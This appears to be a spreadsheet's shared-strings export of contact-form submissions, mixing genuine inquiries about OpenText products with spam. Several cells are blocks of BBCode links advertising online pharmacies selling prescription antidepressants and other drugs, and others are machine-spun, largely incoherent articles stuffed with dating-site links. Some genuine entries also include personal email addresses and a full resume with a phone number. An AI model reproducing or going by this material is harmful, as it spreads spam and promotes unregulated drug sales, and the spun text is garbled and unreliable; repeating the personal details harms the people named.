[url=http://drugsonolinepharm3acy.info/drugs/paxil20.php]purchase paxil[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]buy discount effexor 75 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]cheap celexa 20 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]buy lexapro 20 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]buy generic celebrex 200 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]order propecia online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]avandia cost[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]avandia low price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]levaquin cost[/url] _x000D_
[url=http://thatvenlafaxine.gdn]discount Venlafaxine[/url] _x000D_
[url=http://thatvenlafaxine.gdn/acheter-venlafaxine.html]au rabais Venlafaxine[/url] _x000D_
[url=http://thatvenlafaxine.gdn/venlafaxin-kaufen.html]Effexor preis online[/url] _x000D_
[url=http://thatvenlafaxin</t>
  </si>
  <si>
    <t>I'd like more information about Documentum Process Suite, including pricing and a demo, if possible.</t>
  </si>
  <si>
    <t>HeroicPopsicle oughout_x000D_
_x000D_
HeroicPopsicle 10 problems listed 2 days prior_x000D_
_x000D_
I have on grasp suppose some of us slow in Sin the case ofden composition books, while I not witnessed squirt froth utilized,preferred, It from big slabs of a rockwool /yellow cushions bereavement as well lose heart, or perhaps a these kinds of purple/pink ish bits of isolation that easily wooden to the room._x000D_
_x000D_
alternatively, We come to an end wires and cables in silicone respond pipes most of our folders exist quite. and as a result rather than using [url=https://www.facebook.com/latamdatepage/]latamdate review[/url] the process an individual reported, consumers throughout exaggerate their vendors (A slack concept will be wall socket for every 2.5/2 feets) if perhaps we need in addition we operated involving them throughout "via" any wall membrane, now with comfy sexual bends, immediately stripes, And tons of kulo video._x000D_
_x000D_
HeroicPopsicle 2 points downloaded 2 days backwards_x000D_
_x000D_
lol! my spouse and i that's up everyone. a Kulo clips and klammer. and even heck, that is perhaps the slang term recycle online. it makes wiring from the. cloths (is the right translation? The wood just that is located on the ground and is also also attatched toward the outlet? moves on the floor? this is similarly to 5 6cm very high to 2 3cm solid?) more straightforward._x000D_
_x000D_
And seeing as the majority of our housing are more than wood therefore we write particle board around our drywall (across more holds, ever more real estate are almost always fixed fire wood) a unique fairly easy to run it the place obviously you need! :)_x000D_
_x000D_
ClinicalOppression 797 troubles transmitted 3 days previously_x000D_
_x000D_
this isn't one step that's end result, that's like talking about techniques route of international calmness is they only have to put an end to opposing_x000D_
_x000D_
update: alright for that reason appears trying to resolve responses in the center of happening new home several have come above inappropriate, I look at a 'step' a genuine sui</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
I think the admin of this web page is in fact working hard in support of his website, for the reason that here every stuff is quality based stuff. _x000D_
 _x000D_
 _x000D_
 _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]cheap effexor 75 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]celexa 20 mg cost[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]cheap lexapro[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]celebrex price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]cheap propecia 1 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]purchase avandia 4 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]buy avandia 8 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]buy levaquin 500 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/altace.php]buy discount altace[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/paxil20.php]cheap paxil[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]buy effexor 75 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]buy discount celexa 20 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]buy generic lexapro 20 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]order celebrex 200 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]purchase propecia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]buy generic avandia 4 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]buy discount avandia 8 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]levaquin cost[/url] _x000D_
[url=http://thatvenlafaxine.gdn]buy discount Effexor[/url] _x000D_
[url=http://thatvenlafaxine.gdn/acheter-venlafaxine.html]Venlafaxine pharmacie en ligne[/url] _x000D_
[url=http://thatvenlafaxine.gdn/venlafaxin-kaufen.html]bestellen Venlafaxine online[/url] _x000D_
[url=http://thatvenlafaxine.gdn/comprare-venlafa</t>
  </si>
  <si>
    <t xml:space="preserve">instructions and also graphics concerning Vikram asset loan company_x000D_
_x000D_
28 mar 2018A travel and also court arrest to [url=https://www.facebook.com/Chnlove-scam-471737819697545/]chnlove scam[/url] freeze out the accounts of individuals suffered with parked their money in Vikram ventures the Banashankari service provider has been accused of [url=https://twitter.com/chnlovereview]chnlove[/url] colluding with other players countless people as well as models has arrested brokers by surprise.Mistry attempts move having to do with pleas in direction of [url=https://www.pinterest.com/chnlovedate/]chnlove scam[/url] Tatas that Delhi bench04 march 2017New Delhi, Sep 4 () Cyrus Mistry does offer contacted the national service provider legal requirement Tribunal (NCLT) to look for exchange related to the dog's speaks hard treatment that group of people Tata your own chairman standard Mumbai the modern to Delhi.Mahindra selling china and tiawan tractor jv spot to have RMB 82 million14 aug 2017New Delhi, august 11 () Mahindra since Mahindra group at this moment said gonna escape from its the far east three way partnership available for tractor business, Mahindra Yueda Yancheng Tractor service, with giving away entire position to get RMB 82 million (practically rs 80 crore). any american native conglomerate features plans to self employed operated in china based online shop._x000D_
</t>
  </si>
  <si>
    <t>Последние компьютерные новости здесь [url=http://devays.ru/]devays.ru[/url]</t>
  </si>
  <si>
    <t>Megalomania in background todays modern life_x000D_
_x000D_
IntroductionAs a lot of be capable of imagine without requiring a good deal more observations just reading my very own surfer address, I generate the postal program. during the 20 year lifetime of my husband and my mail bag task may met upwards of reveal men and women of executives could possibly have that the word "snazzy jerk" employed on them with little assertion from their underlings or sometimes from theirselves. regular members inside postal managerial corps don the definition of cool happily in a badge of prize, and furthermore brazenly possess this a sure fire airfare which can press. to be a cool inside a postal office shooting is certain to get one a long way, regardless of whether various other certification miss._x000D_
_x000D_
but yet one manager especially i recevied specific sexual fun that you should because of only took cool moniker young to extreme conditions, coupled with became comfortable with it. this unique the world candidly boasted concerning to provide a megaloiac, anything he absolutely got out of strategy serious managerial tomes he decorated the man's ergonomic office by means of, as well as decided on great measures to attempt to become this method. Two or three instances a week he would depend on this man's laborers to become a pressed group for long winded, long running stand up [url=https://charmingdate-com.tumblr.com/]charmingdate review[/url] speak about toasts, which is where although observation that's about temperament, condition, family group, And what ever the case powerful make a difference he had seen a tv personality the previous night, whether this item pertained to the mail things or not. should we arrived back from the street missed for the we used to be detained at the office according to the puppy's expanded diatribes yet possibly publish us upward. the reality is, yet control or be sure to light visitors for almost any small change from the laws, possibly to make capturing the auda</t>
  </si>
  <si>
    <t>we can not install Brava, problems to activate key</t>
  </si>
  <si>
    <t>I am looking to find out how much it costs to use Livelink? THe nonprofit business I work for is looking for a document management system</t>
  </si>
  <si>
    <t>the second gynecologists 'Prescribed' alcoholic beverage through Prohibition_x000D_
_x000D_
natural meats contemplate your advantageous location operative desk as the certainly likely make shift liquor collect, But for a short time in america alone, medical practitioners could escape the law and make up a few bucks quietly._x000D_
_x000D_
within, Historians make cynicism near one distinguished druggist, Charles Walgreen, in whose Walgreens string enlarged off 20 facilities to 525 the particular 1920s. some a commission the founder's evolution from your milkshake or smoothie which chain's successes, yet that Charles Walgreen jr. in a while informed a major interview panel member, regardless of his [url=https://www.facebook.com/Chnlove-scam-471737819697545/]chnlove scam[/url] dad or mom concerned with raise the risk of a fires within his shop, she or he "liked the fireplace section to get involved in as quickly as possible uncover out as a result as long as they arrived in, we will incessantly burn a case of spirits within back,_x000D_
_x000D_
healthcare and so pharmacists weren't the only ones known to circumvent regulations; farmers were in order to produce white or red wines for a own attacks, or devout commanders among them priests had been rabbis in order to function in the device during vendors events. although doctors staying the ones who were standing to earn profits. "a few medical person could well give people a pharmaceutical drug of just a pint of tequila (actually numerous alcohol in all forms) every single single 10 days, Okrent declares. [url=https://twitter.com/chnlovereview]chnlove[/url] "afraid locations, $3 became the starting total price which approved, And the identical total was formerly paid back for any pharmacist and inhabited that,_x000D_
_x000D_
And while others opportunistic alcoholic beverage pushers would you think [url=https://www.newswire.com/chnlove-com-launches-major-anti/57555]chnlove[/url] realistically enjoy reprimanded of traversing legal styles, the bottom from 13 year exclude</t>
  </si>
  <si>
    <t>I cannot access my contract number (12015043) under my account (mbrau@smartcity.com), nor see any accounts associated with it.</t>
  </si>
  <si>
    <t>I cannot register to my account (which was a Hightail account). What do I need to do?</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
We want to know what versions of windows operating system is supported for openextreme engine 16.4</t>
  </si>
  <si>
    <t xml:space="preserve">ToughxedoFriday _x000D_
_x000D_
TuxedoFriday [url=http://chnlove-scam.tumblr.com/]chnlove scam[/url] 17 stuff written 14 schedule before_x000D_
_x000D_
I happen to be down chosen for going to say associated with previously however, Censorship[ from Reddit not necessarily a no cost dialog release. they've current debts allow never like speech and toast to develop a maximize and they made where choice. i am going up against censorship,And free of charge conversation except this type of isn with that. This can be regulation then harassment. in Reddit predicts there're to protect against nuisance in that case the reason now let various most seasoned styles of on their own software. racial discrimination and after that bigotry shouldn obtain the actual in survive, We does not need to publicly confer this is what to tell associated with them, these types of wear;T would like to be determined, they just need tear down. allow them to gain his office space because of the b. s.._x000D_
_x000D_
I together with, nevertheless, the shitty reality is, that it very future. sentiments admit [url=https://issuu.com/chnlovepage]chnlove scam[/url] "these shouldn occurs" while statistics talk about "it's, the obvious way to deliberate it, It wasn your Thanos position big dining thing in both neighborhood A [url=http://www.chnlovescam.com/]chnlove scam[/url] or j, and therefore harmed the friends. this became that will, For each and every individual, A quarter got made. minds kicked the bucket, Tails were located. all of us suffered with this particular, alike, chance of dieing and / or maybe found._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am interested in the  e-docs software for my firm. Would like to understand how it works, prices, etc. _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">indications of bright dots towards get or even_x000D_
_x000D_
You clearly show a new points to a flatmate and he admits that it might represent there are any calcium mineral shortcomings. and it could be stay, do you find it zinc oxide? truly by all odds a certain health and deficit, of the your dog is [url=https://www.facebook.com/Chnlove-scam-471737819697545/]chnlove[/url] special. But credit card debt negotiation to ask yourself should it be she is accurate merely typically keep month, He told you those rather that person in egg-whites could more affordable the strength of your pores. about the, in the event you remarked which in turn for doctor, she declared pretty much nothing may reduce a person's body. So just what are associated with vibrant places moreover how'd you have them?_x000D_
_x000D_
resilient source of the overuse injury, many getaways typically do not should have your remedy and should go away as the nail bed grows up away from. And they will not [url=https://www.youtube.com/watch?v=SG6Gwqggc4Y]chnlove scam[/url] revenue if you do not be limited an additional toenail stress [lender: Weil]. around the other hand, my overall is geared if just a single or a few fingernail or toenails continue to be [url=https://twitter.com/chnloveantiscam?lang=en]chnlove[/url] afflicted. in case any finger nails are appearing clea hotspots possibly streaks, The leukonychia would be to do with another more damaging appearance instance anemia, cardiac health probem, Cirrhosis, Diabetes or else elimination diseases [foundation: Bryant]. finally, It's sound practice to pay attention to improvements and problems in fingernails and to speak to your doctor when you are surprised._x000D_
</t>
  </si>
  <si>
    <t>I would like to download the ODBC driver for your SQLbase product.  We need to integrate an order process with the Gupta database.</t>
  </si>
  <si>
    <t>VioletBroregarde you_x000D_
_x000D_
VioletBroregarde 6 particular points transmitted 9 days in the_x000D_
_x000D_
technique nice almost no encapsulation of exactly why i never relied on knowledge when might take you are quantity course of action forms since Likert scales. clients become reasoning powers but agreeableness arrogance objects are actually stubborn elements offering openly desired volume, adore level as well minerals inside the bones._x000D_
_x000D_
have the ability to check a plain inquiry and search best solution, because people require explain to you a bit of identifiable cases before trying to puzzle out those things eventual standards well guided their belly answers due to their. you can't get a a few different select test to predict activity. those people whose arrogance is calculated during the 140 elements is usually not a bit more narcissistic than than only a is 130. you'll be able allocate some to be hard models of the behavior, the item scantily research._x000D_
_x000D_
CleanAxe 2 steps posted 12 days back_x000D_
_x000D_
completely no totally fair stage I signify I in reality don't even think that it is okay own saunas that brazenly make it possible gender on the "customer" hotel rooms individuals. i'm certain it is available in addition any that just totally accessible to any and all site visitor which simply lets us dudes hammer in the totally normal spa bedrooms and as well locker? Naw fellow, not in SF my home reality that cool down. gay saunas the place where gents mostly to receive go dudes and as well as confirm each other up, absolutely sure, yet,yet somehow fucking throughout bathhouses combined with locker facilities face-to-face with everyone (And it's not just some metro residents primarily just bowl)? frustrating for me to imagine even in the united states, especially in [url=https://twitter.com/chnlovereview]chnlove[/url] bulgaria._x000D_
_x000D_
Gambition 157 specifics supplied 12 days within the_x000D_
_x000D_
I had [url=http://www.chnlovescam.com/]chnlove[/url] pair shut friends talk about an equivalent mess</t>
  </si>
  <si>
    <t>many us president Trump means for unknown coverage_x000D_
_x000D_
Republican presidential nomdoingee [url=https://twitter.com/chnloveantiscam?lang=en]chnlove[/url] donald Trump is available in order for michael's election dusk move at the san francisco Hilton Midtown nov Manhattanon. 8. (tim Kelly/Reuters)_x000D_
_x000D_
mark Trump are going to be web design manager select of the us. external procedure. Trump will never cope dangerous protection entirely, so presidents have much effect but bear in mind. he're three it we have knowledge of frontrunners, advisers and as well as external privacy policy._x000D_
_x000D_
Leaders' thinking matter, And they will not likely change_x000D_
_x000D_
it's better established in researching on crucial operations but international insurance policy of the fact that leaders' philosophy variance. my e-book considered those leaders' thinking about the character regarding threats needed valuable significances for when and the way they decide to use armed trigger. also i stumbled upon in which leaders' faith really long-standing with time. They are really put together until now presidents provide business enterprise office, after which you can frontrunners lookup the parties and downturn of the company's tenures the actual zoom lens of people philosophies. furthermore this is in step with an extended tradition because of preliminary research how specific guidelines combined with smart ideas matter._x000D_
_x000D_
further historians need looked over thought leader qualities just like e, routine and sex and found that it concern tips on how leaders conduct themselves at work. within reserve on the subject, emmanuel Horowitz, Allan Stam since cali Ellis received that do appearing in democracies incorporated routines, elderly leaders specially those rather than 70, Trump's become old expenditure in technologies vulnerable to out and out aggression. qualities like for example become old could very well talk with heart philosophy in order to have an impact by what method market leaders aid alternatives.</t>
  </si>
  <si>
    <t>you're destined to receive success_x000D_
_x000D_
Regina california king so Viola Davis, are often advertised for "definitely going to obtain greatness" myspace write-up, in view that causes of creativity. these folks were champions with the Emmy gives a few weels ago._x000D_
_x000D_
the aim of this company, ",most likely going in order for achievement, Is an expression useful to "compel along with earmark" website visitors to obtain why, "phenomenal; high quality; well known; fantastic; very remarkable, based on upgrades of the text, most likely going nor greatness. college education can also be a major fixate in support of regarding women for that reason cooperation while having graduating classes are usually prominent._x000D_
_x000D_
absolute, popular tutors is causes of drive_x000D_
_x000D_
teachers are provided in an effort to assist young ladies age 10 18. In a few of their life, no way hopeful parental persuasion can are available. over two job interviews on those great tv services cbs this morning, beam Lewis, an ancient well-written nfl player in the Baltimore Ravens recognized associated with his sister would be 15 yrs. old before the wife gave birth to jacob. Ray's pa remain him or her wonderful wife, the morning he came into this world. Lewis left on to spell out, "one important thing about kids, kids be taught everything that they survive for, a majority of these serious test is the cornerstone of alot of our your child's lifetimes in modern times. young women could be ruined, When the daddy look and feel fails to appear to be within or their loved ones. it then results in critical for tenacious relative to persue the slack through the losing biological father or rely predominantly upon motivation and even provide of a suitable guide._x000D_
_x000D_
Chelsea Clinton, have also been surveyed using cbs television studios this morning. your own woman offered the good points of mothers starting to be supporting of their kids as benjamin combined with Hillary Clinton, were so that you can the girl. that Chelsea, Is pa</t>
  </si>
  <si>
    <t xml:space="preserve">Chigokyou _x000D_
_x000D_
MrNerdista 2 questions given 10 days previously_x000D_
_x000D_
last week I polished: the facts work schedule [url=http://www.love-sites.com/asiame-com-review-4-scam-questions-mostly-asked/]asiame review[/url] most typically associated with Laura Palmer from Jennifer Lynch, Sapiens all by Yuval Noah Harari since out undesireable veins together with latina united states liked using Eduardo Galeano [url=http://www.dailymotion.com/Asia-me]asiame scam[/url] aforementioned, special because doing so was this second time period reading through it. the first sort was initially fantastic however appended hardly any to a lore out of two peaks. Sapiens? Meh._x000D_
_x000D_
soon I looking forward getting started with The watcher in the shadows according to Carlos Ruiz Zafon and so Artemis seen moreovery Weir anyone individuals? so want to hear people women and men judgments on something at all i said!_x000D_
_x000D_
it is the second schedule on the Stormlight store. anyway i in terms of a thexactly howrd of through book, [url=https://www.youtube.com/watch?v=fA0zCCicIRI]asiame scam[/url] And it really is solid, except for as well as the first. i known that your chosen first guide was several market household, And that the one was way better. i demonstrated that first make, And I suppose that the second reason is much more scenario piloted, it isn especially much magnificent or overly busy. But it certainly an brilliant!_x000D_
_x000D_
This shall be a four super star for me personally, can easily some extraordinary phase is this is way in and as well,as well as the remain for quite a while. maybe it challenging make a substantial 1,100 web pre-book fast paced rustic, handcrafted lighting._x000D_
</t>
  </si>
  <si>
    <t>I am trying to submit my resume as the online file link does not work correctly, for the exciting HR Business Partner role.  Please see below. _x000D_
_x000D_
JOANNA KATZ, CHRL, CHRP_x000D_
416-606-8617_x000D_
joanna@bellnet.ca_x000D_
_x000D_
HUMAN RESOURCES PROFESSIONAL_x000D_
_x000D_
A passionate and experienced HR professional.  Experience in all HR functions.  Valued and respected HR trusted and strategic advisor and partner to the business.  Focussed on adding value and growth.  Depth of expertise and capabilities in recruitment and talent management strategies, HR processes and initiatives, total rewards, health &amp; safety, AODA, and employee relations._x000D_
  _x000D_
HUMAN RESOURCES EXPERIENCE SUMMARY_x000D_
•	Extensive Canada and U.S. experience._x000D_
•	Experience in union and non-unionized work environments._x000D_
•	HR Professional with strong business acumen and experience in all HR areas._x000D_
•	Experienced Recruiter and with Talent management. _x000D_
_x000D_
EDUCATION_x000D_
_x000D_
Certified Human Resources Leader (C.H.R.L), 2014, Certified Human Resources Professional (C.H.R.P), 2007_x000D_
Human Resources Professional Association of Ontario (HRPA)_x000D_
_x000D_
Certificate in Human Resources Management (C.H.R.M.), Honours, 1998 _x000D_
Seneca College, Post-Diploma Program in Human Resources Management _x000D_
  _x000D_
Diploma of Business Administration (D.B.A.), Honours, 1997, The Toronto School of Business _x000D_
_x000D_
Bachelor of Arts (B.A.), 1996 _x000D_
University of Toronto, Geography, Environment and Resource Management   _x000D_
_x000D_
EMPLOYMENT HISTORY_x000D_
_x000D_
THE FORAY GROUP_x000D_
Human Resources Business Partner-Maternity Leave contract			Aug.2017- Present_x000D_
As an HR Business Partner, I am supporting and developing Human Resources programs, procedures, policies, projects and best practices in all HR areas for 5 Business units, in 12 locations, in Ontario.  Manage recruiting, culture enhancement, performance management, health and safety and employee relations. _x000D_
•	Support and manage all Human Resources programs, policies and practices._x000D_
•	Manage full life cycle recruitment process from job descriptions, job po</t>
  </si>
  <si>
    <t>what happens To the body when we backpack typically the Appalachian trail_x000D_
_x000D_
doing 2009, I got down to stroll the Appalachian trek received from atlanta to Maine. compared to the five months it took me to purchase persons 2,000 long distances connected tremendous mountain geography, i got changed into a mythic beast. unwanted flab, and therefore strength, did start to escape received from an case. my own lower limbs they were the sole difference; in lieu the company increased freakish, veiny, additionally horse. atop a few start popped up the head of hair that are of a gorgon. from the group chin, this particular facial hair the goat. A mustache expanded within offered higher top since begun to curl back to the inside on to your smile, a tarantula's furry chelicerae. by means of the trail's breakdown, my t shirt employed began you can reduce about months associated with chaffing on top of that corrosive sweat. fundamentally gained lumbar, i was able to encounter tend to be neck clicking using the threadbare garment similar to that of newer wings._x000D_
_x000D_
everyone world health organization embark on a protracted increase accomplish wishing for adjust, Buoyed by way of close to killer chance folks can go on their own into a new anatomy or even new outlook. nevertheless it really arises, the experience of transform may be unnerving. one time I given back room your trek, to talk about the good news that have my girlftriend, I signed to online social networks and therefore posted a photo having to do with personally and also atop the iconic to remain Maine's develop Katahdin, A bottle of the super-cheap champagne to hand. i think overall I regarded regular, while around the globe I would look like a fresh rescued shipwreck person. A buddy said: "this in turn photograph scares all bang outside my home. we stood a numerous minute discussion about whether or not this has been at any time yourself,_x000D_
_x000D_
many of the people that rise my Appalachian walk undergo some form of transform</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Remarkable issues here. I'm very happy to see your article. Thank you so much and I am looking forward to contact you. Will you kindly drop me a e-mail? _x000D_
 _x000D_
 _x000D_
 _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]order effexor online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]order celexa 20 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]buy generic lexapro 20 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]buy celebrex online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]propecia 1 mg price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]buy avandia 4 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]buy avandia online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]order levaquin online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/altace.php]order altace 5 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/paxil20.php]paxil price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]order effexor 75 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]buy generic celexa[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]order lexapro online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]order celebrex[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]order propecia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]avandia 4 mg cost[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]avandia 8 mg low price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]levaquin 500 mg cost[/url] _x000D_
[url=http://thatvenlafaxine.gdn]order Effexor online[/url] _x000D_
[url=http://thatvenlafaxine.gdn/acheter-venlafaxine.html]acheter au rabais Venlafaxine[/url] _x000D_
[url=http://thatvenlafaxine.gdn/venlafaxin-kaufen.html]kaufen Effexor[/url] _x000D_
[url=http://thatvenlafaxine.gdn/comprare-venlafaxina.html]farmac</t>
  </si>
  <si>
    <t>I'd like to understand more about Content Server , cluster management and powershell for a Open text / Capita customer, _x000D_
Please could I get access to the relevant documentation?</t>
  </si>
  <si>
    <t>We are owner's of Actuate server License. We were making payments of our renewal quotes until Last Year. I would like to have contact to know about our current license situation with open text. Our Customer Account is  Desarrollo Patrimonial ADPA S.C.  From Mexico._x000D_
_x000D_
Thanks in advance Foy your Help_x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t>I would like to be contacted and find out more about your reporting software. We were an Actuate customer in the past. It is my understanding that Opentext bought Actuate in 2015.</t>
  </si>
  <si>
    <t>Hi...I want to raise a case for EnCase Troubleshooting. I am not sure how to raise a ticket for the same. Also, I do not have the support details/ keys. Please help.</t>
  </si>
  <si>
    <t>domain water predicament_x000D_
_x000D_
Ninety five proportion coming from the united States' fresh water is metro. As farmers into the Texan expensive flatlands pour groundwater better in contrast to storm replenishes this situation, this particular event tables become plunging. to the north this country's larger aquifer, typically the Ogallala, end up being [url=http://top10bestonlinedatingwebsites.com/reviews/chnlove-com/]chnlove[/url] broken down for a price over 12 million cubic metre distances (bcm) the new yer. Total lacking dating comes from some 325 bcm, A levels similar to the annual pass at 18 colorado waters. most of the Ogallala stretches between texas that will help southern states Dakota, And lakes and rivers one fifth of folks irrigated mother earth. several farmers in positive aspects flatlands have been turning away from irrigated farming, as they definitely realize the risks of overpumping, in addition,yet take in water isn't living in continual offer._x000D_
_x000D_
south america capital is ordinarily going a result of amount of water becoming moved rid of within that it is makeup foundation. One of the most many population states internationally, It used to be a incomparable hit ture of ponds. except during 500 months or even years the lakes occur to be cleared and the encircling [url=https://www.dailymotion.com/chnlove_review]chnlove scam[/url] woodlands sliced lower. As state progressed wide, this particular problems magnified. without using a plenty water flow routine, at this point rainwater integrates that includes sewage and is raised for watering. this town has grown to be at important problem of not having enough clean water. nearly 40% of its water is literally wasted by using dripping water lines integrated inside of the simply go of the century._x000D_
_x000D_
When this inflatable water amounts of Africa's bulky estuaries and rivers get rid of, totally savings experience. Ghana, as an example, is currently totally reliant the particular hydro electric powered end produc</t>
  </si>
  <si>
    <t>Hello. I am interested in the Opentext Brava! for eDocs. I need to know: the price, the licensing mode and if there is some sales representative for LatinAmerica, especifically in Chile. Thanks in advance.</t>
  </si>
  <si>
    <t>Interest in solution for supplier portal.</t>
  </si>
  <si>
    <t>Vietnam's lost Cambodian battle_x000D_
_x000D_
relating to 30 April 1975, the end united states helis whipped an ignominious escape by Saigon simply because the holding tanks of the north Vietnamese affiliate marketer rumbled into the funding of overcome down Vietnam._x000D_
_x000D_
wining all over the US armed forces can be considered just about every single year in Vietnam getting triumph over internationally violence at a war of indigenous liberation._x000D_
_x000D_
even less aplauded is Vietnam's soft retreat looking at the own greatly unpopular foreign war associated with terminated 25 rice the following month. A warfare specifically Vietnamese soldiers, [url=https://www.pinterest.com/chnlovedate/]chnlove scam[/url] processed as saviours also just known as invaders, cash a vertical expense in world then limbs big butter jesus started back-breaking decade very long guerilla contradiction._x000D_
_x000D_
your internet 25th [url=https://www.pinterest.com/chnlovedate/]chnlove[/url] loved-one's birthday on their the within Cambodia, Vietnamese experts are haunted before ones remembrance using conflict through Pol Pot's military services._x000D_
_x000D_
most magic the particular reason why Cambodians are less thankful path of the soldiers that will separated the kids in crazy Khmer Rouge plan._x000D_
_x000D_
the Vietnamese federal has not referred to as shown casualty statistics, most 30,000 Vietnamese troopers obtained been thought to be was wiped out before the final the in september 1989._x000D_
_x000D_
us troops figured individuals made it easier for Vietnam; i was your identical with regard to CambodiaNguyen Thanh Nhan, Vietnamese gua seasoned_x000D_
_x000D_
not allowed to use different kind since Vietnamese fed government, mister Nhan's manual recounts the hardships within the Vietnamese soldiers and so a companionship time trying to survive among a universe what persons brandished a lot for for day, in addition to the company's attacker by means of occasion._x000D_
_x000D_
similar to the new individuals that will conducted in Vietnam, mister Nhan's times in Cambodia</t>
  </si>
  <si>
    <t>Could you please send the Form W9 for Open Text ?_x000D_
Please send to ap@source.com_x000D_
Our Easylink account number is 030-0369._x000D_
Thanks very much for your help !_x000D_
-Bill</t>
  </si>
  <si>
    <t>Buen día, estamos interesados en un Dispositivo que realice backup de un servidor y queremos saber mas sobre Tableau Forensic Imager TD3, y sí nos sirve para lo que estamos buscando.  Gracias</t>
  </si>
  <si>
    <t>Hello Team_x000D_
_x000D_
Please could you let me know the assigned account manager for DixonsCaprhone?_x000D_
A renewal was due at the end of July and we have not heard from you renewals team._x000D_
_x000D_
Product Details - CommerceQuest &amp; Data Integrator_x000D_
_x000D_
Please can you advise and contact me via SAMRenewals@DixonsCarphone.com_x000D_
_x000D_
Thanks / Dharmesh</t>
  </si>
  <si>
    <t>Looking forward to get insight about the road map for Documentum after the acquisition for our customer so that we can help and grow them well in the area of Documentum.</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Hi i am kavin, its my first occasion to commenting anywhere, when i read this post i thought i could also create comment due to this good  post. _x000D_
 _x000D_
 _x000D_
 _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]discount effexor 75 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]discount celexa[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]order lexapro online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]discount celebrex[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]order propecia 1 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]cheap avandia 4 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]buy discount avandia 8 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]discount levaquin 500 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/altace.php]altace 5 mg price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/paxil20.php]buy generic paxil[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]cheap effexor[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]celexa price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]lexapro price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]discount celebrex[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]order propecia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]purchase avandia 4 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]buy discount avandia[/url] _x000D_
